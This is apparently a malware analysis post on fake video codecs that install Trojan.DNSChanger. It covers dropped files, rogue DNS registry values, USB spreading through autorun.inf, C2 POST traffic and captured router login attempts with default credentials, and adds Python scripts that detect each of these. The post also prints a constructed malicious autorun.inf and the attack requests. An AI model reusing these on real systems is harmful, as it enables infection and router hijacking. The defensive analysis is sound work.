PluginVideo: a fake codec that installs Trojan.DNSChanger

In the last few days, while browsing the Internet, I was redirected to a file named VideoCodec.exe and to another file named PluginCodec.exe. Both are fake video codecs: what they actually install is Trojan.DNSChanger.

Trojan.DNSChanger modifies the DNS settings of the compromised computer so that name resolution goes through a rogue DNS server controlled by the attacker. The effects range from the victim no longer being able to update the antivirus (update hostnames resolve to the wrong place), to hijacked search results and redirections to affiliate or porn websites. In some cases the rogue resolver sends the victim to a phishing page that aims to steal credit card or bank account details.

This kind of trojan can also install further components on the affected system, such as BHOs (Browser Helper Objects) or rootkit drivers; the drivers hide the trojan's presence and protect its files and registry keys from being deleted by the user or by security software.

This is a screenshot of the VideoCodec installation window:

Screenshot of a fake video codec installation window

When the program is executed, it creates the following files:

%User%\LOCALS~1\Temp\PluginVideo.exe
C:\autorun.inf
C:\WINDOWS\system32\drivers\gxvxcserv.sys
C:\WINDOWS\system32\drivers\gxvxcvpawwkrvklrlnsvxextpuyfwaadaswwx.sys
C:\WINDOWS\system32\gxvxcvmdbxrmbpjpgwmrqphukiabsqwmicjnt.dll
C:\WINDOWS\system32\gxvxcnopsdxpgyqxwsgkjsqmrnmbvbqhwipoo.dll
C:\WINDOWS\system32\gxvxccount
%User%\LOCALS~1\Temp\gaopdx1148761
C:\WINDOWS\Tasks\{5B57CF47-0BFA-43c6-ACF9-3B3653DCADBA}.job
C:\Program Files\PluginVideo
C:\Program Files\PluginVideo\Uninstall.exe
%User%\Start Menu\Programs\PluginVideo
%User%\Start Menu\Programs\PluginVideo\Uninstall.lnk

The program creates the following registry entries (CCS is CurrentControlSet, CS1 is ControlSet001; the hijacked NameServer values are written both to the global Tcpip parameters and to the per-interface key):

HKLM\System\CCS\Services\Tcpip\..\{B84DA37B-654A-4425-ACA3-DE03D2022067}:
NameServer = 85.255.112.151,85.255.112.207
HKLM\System\CS1\Services\Tcpip\Parameters:
NameServer = 85.255.112.151,85.255.112.207
HKLM\System\CCS\Services\Tcpip\Parameters:
NameServer = 85.255.112.151,85.255.112.207
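A quick way to check a machine for this kind of hijack is to read every NameServer value and compare it against the rogue resolvers. The script below is an added example, not part of the original post or of the malware: it scans either a text dump in the layout shown above or, on Windows, the live registry (the global Tcpip\Parameters key and each key under Parameters\Interfaces). The two addresses come from the listing above; widening them to the 85.255.112.0/20 block they sit in is an assumption made for the example, as is the constructed sample dump and the interface GUID placement in it.

```python
import ipaddress
import re
import sys

# Rogue resolvers: the two addresses from the registry values above, widened to
# the 85.255.112.0/20 block they sit in. The block is an assumption made for
# this example; narrow or extend the list from your own indicator feed.
ROGUE_DNS = [
    ipaddress.ip_network("85.255.112.151/32"),
    ipaddress.ip_network("85.255.112.207/32"),
    ipaddress.ip_network("85.255.112.0/20"),
]


def parse_nameserver(value):
    """Split a NameServer value; Windows accepts commas or spaces as separators."""
    return [s for s in re.split(r"[,\s]+", value.strip()) if s]


def rogue_servers(value):
    """Return the resolvers in a NameServer value that fall inside a rogue range."""
    hits = []
    for server in parse_nameserver(value):
        try:
            ip = ipaddress.ip_address(server)
        except ValueError:
            continue  # not an address at all: worth a look, but not a DNS hit
        if any(ip in net for net in ROGUE_DNS):
            hits.append(server)
    return hits


def scan_registry_text(dump):
    """Scan a text dump in the form shown on this page ('key:' line followed by
    'NameServer = a,b'). Returns a list of (key, rogue_resolvers) tuples."""
    findings = []
    key = None
    for line in dump.splitlines():
        line = line.strip()
        m = re.match(r"NameServer\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            hits = rogue_servers(m.group(1))
            if hits:
                findings.append((key, hits))
        elif line.endswith(":"):
            key = line[:-1].strip()
    return findings


def scan_live_registry():
    """Windows only: read NameServer from the Tcpip\\Parameters key and from
    every per-interface subkey, which is where the trojan writes its values."""
    import winreg  # only importable on Windows

    base = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"
    keys = [base]
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base + r"\Interfaces") as ifs:
        count = winreg.QueryInfoKey(ifs)[0]
        keys += [f"{base}\\Interfaces\\{winreg.EnumKey(ifs, i)}" for i in range(count)]
    findings = []
    for key in keys:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as handle:
                value, _ = winreg.QueryValueEx(handle, "NameServer")
        except OSError:
            continue  # key or value absent: the interface uses DHCP-assigned DNS
        hits = rogue_servers(value)
        if hits:
            findings.append((key, hits))
    return findings


# Constructed sample in the page's layout: one hijacked interface key (the GUID
# is the one from the listing above, placed under Parameters\Interfaces) and one
# clean global key. On the real infected host the global keys were rogue too.
SAMPLE_DUMP = """
HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{B84DA37B-654A-4425-ACA3-DE03D2022067}:
NameServer = 85.255.112.151,85.255.112.207
HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters:
NameServer = 192.168.0.1
"""

if __name__ == "__main__":
    results = scan_live_registry() if sys.platform == "win32" else scan_registry_text(SAMPLE_DUMP)
    for key, hits in results:
        print(f"ROGUE DNS in {key}: {', '.join(hits)}")
```

Run it on the infected box and every interface key listed is one that has to be cleared (or reset to DHCP) after the driver and DLLs are removed; resetting only the global key leaves the per-interface value, and the interface value wins.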

The file created at C:\autorun.inf is used by the trojan to spread itself to removable devices such as USB drives:

Trojan DNSChanger spread by USB

The USB spreading procedure works as follows:

1) The user inserts a USB device into the infected PC;
2) The trojan hijacks (or creates) the autorun.inf on the USB device and copies itself onto the device under the folder \RECYCLE\***;
3) The user inserts the USB device into another PC;
4) If that PC has AutoRun enabled, the autorun.inf on the USB device executes the trojan and the PC is infected.
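The autorun.inf dropped on the stick is the whole infection vector for step 4, so it is worth being able to triage one without a Windows box. The following is an added example (not code from the original post): a tolerant autorun.inf parser that lists everything the file would execute and flags the tricks this family relies on, the executable hidden under a recycle-bin folder, plus two related heuristics that go beyond what the page shows: a shell\open\command override (so a double-click on the drive runs the malware even without AutoRun) and an action label that imitates Explorer's own "Open folder to view files" entry. Both samples are constructed; the page only shows the \RECYCLE\ prefix, so the folder and file names are invented.

```python
import re

# Keys whose value Windows executes: open/shellexecute on AutoRun, and the
# per-verb commands that replace the drive's context-menu and double-click actions.
LAUNCH_KEYS = {"open", "shellexecute"}
VERB_COMMAND = re.compile(r"^shell\\[^\\]+\\command$")
# Folder the trojan's copy hides behind, per the page (\RECYCLE\...); RECYCLER
# and RECYCLED are the same trick on other Windows versions (assumption).
RECYCLE_DIR = re.compile(r"(^|[\\/])recycle[rd]?([\\/]|$)", re.IGNORECASE)
# Text Explorer itself shows for a removable drive; an autorun.inf that uses it
# as its 'action' label is spoofing the AutoPlay dialog (heuristic added here).
EXPLORER_ACTION = "open folder to view files"


def parse_autorun(text):
    """Tolerant INI parser: keeps duplicate keys and skips junk lines, because
    malicious autorun.inf files are often padded with garbage to evade signatures."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r"^\[(.+?)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def first_token(command):
    """The program part of a command line, with surrounding quotes removed."""
    m = re.match(r'"([^"]*)"|(\S+)', command)
    return (m.group(1) or m.group(2)) if m else ""


def launch_targets(sections):
    """Every (key, program) pair that AutoRun or Explorer could execute."""
    targets = []
    for key, value in sections.get("autorun", []):
        if key in LAUNCH_KEYS or VERB_COMMAND.match(key):
            targets.append((key, first_token(value)))
    return targets


def assess(text):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    sections = parse_autorun(text)
    findings = []
    for key, program in launch_targets(sections):
        if RECYCLE_DIR.search(program):
            findings.append(f"{key} runs a file hidden in a recycle-bin folder: {program}")
        if key == "shell\\open\\command":
            findings.append(f"double-clicking the drive is redirected to {program}")
    for key, value in sections.get("autorun", []):
        if key == "action" and value.lower() == EXPLORER_ACTION:
            findings.append("action label imitates Explorer's own AutoPlay entry")
    return findings


# Constructed sample modelled on the USB procedure above; folder and file names
# are invented, the page only shows the \RECYCLE\ prefix.
MALICIOUS_AUTORUN = r"""
[autorun]
open=RECYCLE\S-1-5-21-1111111111-2222222222-3333333333-1000\updater.exe
shell\open\command=RECYCLE\S-1-5-21-1111111111-2222222222-3333333333-1000\updater.exe
action=Open folder to view files
icon=%SystemRoot%\system32\shell32.dll,4
"""

# Constructed benign sample: an installer CD that simply launches its setup program.
BENIGN_AUTORUN = r"""
[autorun]
open=setup.exe
icon=setup.exe
label=Product Installer
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, assess(sample) or ["no findings"])
```

The parser deliberately does not use configparser: a real dropped autorun.inf frequently repeats keys, mixes case, and carries lines with no "=" at all, and a strict INI reader either raises or silently drops the one line that matters.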

The program generates the following Internet traffic on port 80:

POST /cgi-bin/generator HTTP/1.0
Host: 213.163.64.81
Content-Length: 73

POST /adc.php HTTP/1.0
Host: 213.163.64.81
Content-Length: 44
Pragma: no-cache

From the following traffic we can see that the trojan then started attacking the router's login page on the LAN: it requests common admin URLs (including a D-Link setup-wizard page) and tries HTTP Basic credentials with the default usernames and an empty password (YWRtaW46 decodes to "admin:", cm9vdDp= to "root:"), while spoofing an Internet Explorer 6 User-Agent:

GET /index.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X

GET /dlink/hwiz.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X

GET /index.asp HTTP/1.1
Authorization: Basic YWRtaW46
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X

GET / HTTP/1.1
Authorization: Basic cm9vdDp=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X
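This pattern, a workstation sending Basic credentials for factory-default accounts to a private address, is easy to detect on the wire once the requests are grouped per host. The script below is an added example, not part of the original post: it parses a raw capture in the format shown above, decodes the Basic credentials (tolerating the odd padding of cm9vdDp=), and raises an alert for any private-range host that receives a factory-default login or two or more distinct credentials, reporting the admin pages that were probed as context. The capture is constructed from the requests above; the router address 192.168.0.1 is invented because the page masks it, and the list of default credentials beyond admin/root with empty passwords is an assumption.

```python
import base64
import ipaddress
import re
from collections import defaultdict

# Default accounts the trojan tried in the capture above (admin and root with an
# empty password) plus a few other factory defaults (assumption; extend as needed).
DEFAULT_CREDS = {("admin", ""), ("root", ""), ("admin", "admin"),
                 ("admin", "password"), ("root", "root")}
# Admin pages requested above; /dlink/hwiz.html is a D-Link setup-wizard page.
ROUTER_PATHS = {"/index.asp", "/dlink/hwiz.html"}


def split_requests(capture):
    """Requests in a raw capture are separated by blank (or whitespace-only) lines."""
    return [b for b in re.split(r"\n\s*\n", capture.strip()) if b.strip()]


def parse_request(block):
    """Request line plus headers; header names are lower-cased for lookup."""
    lines = block.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def decode_basic(auth_header):
    """(user, password) from a Basic credential, tolerating bad padding such as
    the 'cm9vdDp=' above, which a strict decoder might reject."""
    m = re.match(r"Basic\s+(\S+)", auth_header, re.IGNORECASE)
    if not m:
        return None
    token = m.group(1).rstrip("=")
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4)).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError
        return None
    user, _, password = raw.partition(":")
    return user, password


def is_lan_host(host):
    """True for private-range addresses, i.e. the local router or another LAN box."""
    try:
        return ipaddress.ip_address(host.rsplit(":", 1)[0]).is_private
    except ValueError:
        return False  # a hostname rather than a literal address


def find_router_attacks(capture):
    """Group requests by private-range host and report credential guessing."""
    by_host = defaultdict(lambda: {"paths": set(), "creds": []})
    for block in split_requests(capture):
        req = parse_request(block)
        host = req["headers"].get("host", "")
        if not is_lan_host(host):
            continue  # C2 traffic to public addresses is a different detection
        by_host[host]["paths"].add(req["path"])
        auth = req["headers"].get("authorization")
        if auth:
            cred = decode_basic(auth)
            if cred:
                by_host[host]["creds"].append(cred)
    findings = []
    for host, info in by_host.items():
        distinct = set(info["creds"])
        defaults = sorted(c for c in distinct if c in DEFAULT_CREDS)
        # Any factory-default login, or two or more different credentials to the
        # same LAN host, is guessing; probed admin pages are reported as context.
        if defaults or len(distinct) >= 2:
            findings.append({"host": host, "default_creds": defaults,
                             "distinct_creds": len(distinct),
                             "probed_paths": sorted(info["paths"] & ROUTER_PATHS)})
    return findings


# Constructed capture in the page's format: the router address is invented, the
# paths, User-Agent and credentials are those shown above, plus one C2 POST.
SAMPLE_CAPTURE = """GET /index.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.0.1

GET /dlink/hwiz.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.0.1

GET /index.asp HTTP/1.1
Authorization: Basic YWRtaW46
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.0.1

GET / HTTP/1.1
Authorization: Basic cm9vdDp=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.0.1

POST /adc.php HTTP/1.0
Host: 213.163.64.81
Content-Length: 44
"""

if __name__ == "__main__":
    for finding in find_router_attacks(SAMPLE_CAPTURE):
        print(finding)
```

Because the trojan sends Basic credentials in clear text from the infected PC, a sensor on the LAN segment sees the exact usernames tried; the same logic ports directly to a proxy or IDS log as long as the Authorization header survives in the record.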
